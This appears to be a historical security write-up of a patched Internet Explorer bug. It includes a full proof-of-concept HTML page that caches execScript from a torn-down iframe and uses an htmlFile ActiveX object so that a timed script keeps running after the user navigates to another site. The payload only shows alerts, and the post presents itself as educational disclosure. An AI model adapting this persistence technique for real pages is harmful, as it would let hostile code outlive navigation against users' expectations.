Resident Script via Cached execScript from an Iframe

I was curious whether caching execScript — the IE-specific method for running code in a window’s context — from an iframe would survive a page reload in the same way that window.open had. It did. By stashing the cached execScript reference into window.opener via an onunload handler inside the iframe, I could later use it to create an htmlFile ActiveX object and set a persistent interval that kept running even after navigating the visible tab to Google.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Resident_Cached_execScript</title></head>
<body>
<center>
<font face="Tahoma" size="2">
<h2>Resident_Cached_execScript</h2>
</center>
1) Copy [Cache] the execScript method from an IFRAME, and then, reload the page.<br />
<font color="blue">ifr.execScript('window.onunload = function(){top.opener = window.execScript}');</font><br />
<font color="blue">location.reload();</font><br /><br />

2) After reloading, use [cached] the execScript to create an htmlFile.<br />
<font color="blue">cachedExecScript = opener;</font><br />
<font color="blue">cachedExecScript('htmlDoc = new ActiveXObject("htmlFile")');</font><br />
<font color="blue">cachedExecScript('htmlDoc.parentWindow.setInterval("alert(\'I am resident...\')",5000)');</font><br /><br />

3) That's it.<br /><br />

</font>
<iframe name="ifr" src=""></iframe>
<script language="JavaScript">
window.onload = function()
{
	if (!window.opener)
	{
		ifr.execScript('window.onunload = function(){top.opener = window.execScript}');
		location.reload();
	}
	else
	{
		alert("Click OK to go to Google, and wait 5 seconds to see the alert...");
		cachedExecScript = opener;
		cachedExecScript('htmlDoc = new ActiveXObject("htmlFile")');
		cachedExecScript('htmlDoc.parentWindow.setInterval("alert(\'I am resident...\')",5000)');
		location.replace('http://www.google.com');
	}
}

</script>
</body>
</html>

The sequence works because ifr.execScript runs code in the iframe’s own window context. By injecting an onunload handler into the iframe that copies window.execScript into top.opener, the reference is captured at the exact moment the iframe is torn down during the page reload. After the reload, the cached execScript still executes in the ghost context of the old iframe. From there, creating an htmlFile ActiveX object gives access to yet another independent window context (htmlDoc.parentWindow), and setInterval registered on that window keeps firing even after the visible tab has navigated away entirely. It is a chain of three stale context references, each one keeping the next alive.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.